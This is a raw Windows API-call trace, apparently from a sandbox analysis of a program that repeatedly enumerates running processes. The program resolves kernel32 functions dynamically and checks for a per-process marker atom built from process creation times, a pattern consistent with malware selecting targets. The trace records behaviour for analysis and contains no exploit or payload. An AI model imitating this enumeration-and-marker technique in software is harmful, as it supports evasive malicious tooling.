	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0086.138] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.138] CloseHandle (hObject=0x69c) returned 1
	[0086.138] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0086.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0086.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.139] CloseHandle (hObject=0x69c) returned 1
	[0086.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0086.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.139] CloseHandle (hObject=0x69c) returned 1
	[0086.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0086.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.139] CloseHandle (hObject=0x69c) returned 1
	[0086.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0086.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.139] CloseHandle (hObject=0x69c) returned 1
	[0086.139] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0086.139] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.140] CloseHandle (hObject=0x69c) returned 1
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0086.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.140] CloseHandle (hObject=0x69c) returned 1
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0086.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.140] CloseHandle (hObject=0x69c) returned 1
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0086.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.140] CloseHandle (hObject=0x69c) returned 1
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0086.140] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.140] CloseHandle (hObject=0x69c) returned 1
	[0086.140] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0086.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0086.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.141] CloseHandle (hObject=0x69c) returned 1
	[0086.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0086.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.141] CloseHandle (hObject=0x69c) returned 1
	[0086.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0086.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.141] CloseHandle (hObject=0x69c) returned 1
	[0086.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0086.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.141] CloseHandle (hObject=0x69c) returned 1
	[0086.141] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0086.141] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.141] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.142] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.142] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.142] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.142] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.142] CloseHandle (hObject=0x69c) returned 1
	[0086.142] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0086.142] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0086.143] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0086.143] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0086.143] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0086.143] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0086.143] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.143] CloseHandle (hObject=0x69c) returned 1
	[0086.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0086.144] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.144] CloseHandle (hObject=0x69c) returned 1
	[0086.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0086.144] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.144] CloseHandle (hObject=0x69c) returned 1
	[0086.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0086.144] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.144] CloseHandle (hObject=0x69c) returned 1
	[0086.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.144] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.144] CloseHandle (hObject=0x69c) returned 1
	[0086.144] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.145] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.145] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0086.145] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0086.145] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0086.145] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.145] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0086.146] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.146] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0086.146] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0086.146] CloseHandle (hObject=0x69c) returned 1
	[0086.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0086.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0086.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0086.146] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.146] CloseHandle (hObject=0x69c) returned 1
	[0086.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0086.146] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0086.146] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.146] CloseHandle (hObject=0x69c) returned 1
	[0086.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x172f8) returned 0xc0000004
	[0086.228] VirtualAlloc (lpAddress=0x0, dwSize=0x173f8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0086.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x173f8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0086.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0086.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0086.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0086.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0086.232] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.232] CloseHandle (hObject=0x69c) returned 1
	[0086.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0086.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0086.274] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0086.274] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.274] CloseHandle (hObject=0x69c) returned 1
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0086.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.275] CloseHandle (hObject=0x69c) returned 1
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x69c
	[0086.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.275] CloseHandle (hObject=0x69c) returned 1
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x69c
	[0086.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.275] CloseHandle (hObject=0x69c) returned 1
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x69c
	[0086.275] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.275] CloseHandle (hObject=0x69c) returned 1
	[0086.275] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x69c
	[0086.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.276] CloseHandle (hObject=0x69c) returned 1
	[0086.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x69c
	[0086.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.276] CloseHandle (hObject=0x69c) returned 1
	[0086.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0086.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x69c
	[0086.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.276] CloseHandle (hObject=0x69c) returned 1
	[0086.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x69c
	[0086.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.276] CloseHandle (hObject=0x69c) returned 1
	[0086.276] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x69c
	[0086.276] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.276] CloseHandle (hObject=0x69c) returned 1
	[0086.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0086.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x69c
	[0086.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.277] CloseHandle (hObject=0x69c) returned 1
	[0086.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x69c
	[0086.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.277] CloseHandle (hObject=0x69c) returned 1
	[0086.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x69c
	[0086.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.277] CloseHandle (hObject=0x69c) returned 1
	[0086.277] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x69c
	[0086.277] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.277] CloseHandle (hObject=0x69c) returned 1
	[0086.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x69c
	[0086.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.278] CloseHandle (hObject=0x69c) returned 1
	[0086.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x69c
	[0086.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.278] CloseHandle (hObject=0x69c) returned 1
	[0086.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x69c
	[0086.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.278] CloseHandle (hObject=0x69c) returned 1
	[0086.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x69c
	[0086.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.278] CloseHandle (hObject=0x69c) returned 1
	[0086.278] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x69c
	[0086.278] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.278] CloseHandle (hObject=0x69c) returned 1
	[0086.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x69c
	[0086.279] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.279] CloseHandle (hObject=0x69c) returned 1
	[0086.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x69c
	[0086.279] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.279] CloseHandle (hObject=0x69c) returned 1
	[0086.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x69c
	[0086.279] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.279] CloseHandle (hObject=0x69c) returned 1
	[0086.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x69c
	[0086.279] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.279] CloseHandle (hObject=0x69c) returned 1
	[0086.279] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x69c
	[0086.279] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.279] CloseHandle (hObject=0x69c) returned 1
	[0086.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x69c
	[0086.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.280] CloseHandle (hObject=0x69c) returned 1
	[0086.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x69c
	[0086.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.280] CloseHandle (hObject=0x69c) returned 1
	[0086.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x69c
	[0086.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.280] CloseHandle (hObject=0x69c) returned 1
	[0086.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x69c
	[0086.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.280] CloseHandle (hObject=0x69c) returned 1
	[0086.280] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x69c
	[0086.280] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.280] CloseHandle (hObject=0x69c) returned 1
	[0086.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.281] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.281] CloseHandle (hObject=0x69c) returned 1
	[0086.281] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x69c
	[0086.281] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.281] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0086.281] GetProcessTimes (in: hProcess=0x69c, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0086.282] wsprintfA (in: param_1=0x3976208, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0086.282] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.282] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0086.282] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0086.282] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0086.283] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0086.283] CloseHandle (hObject=0x69c) returned 1
	[0086.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0086.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0086.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x69c
	[0086.283] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.283] CloseHandle (hObject=0x69c) returned 1
	[0086.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0086.283] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe6c) returned 0x69c
	[0086.283] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.283] CloseHandle (hObject=0x69c) returned 1
	[0086.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x172f8) returned 0xc0000004
	[0086.353] VirtualAlloc (lpAddress=0x0, dwSize=0x173f8, flAllocationType=0x3000, flProtect=0x4) returned 0x3bf0000
	[0086.353] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3bf0000, Length=0x173f8, ResultLength=0x0 | out: SystemInformation=0x3bf0000, ResultLength=0x0) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0086.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0086.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x69c
	[0086.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.357] CloseHandle (hObject=0x69c) returned 1
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x69c
	[0086.357] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.357] CloseHandle (hObject=0x69c) returned 1
	[0086.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0086.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x69c
	[0086.358] IsWow64Process (in: hProcess=0x69c, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0086.358] CloseHandle (hObject=0x69c) returned 1
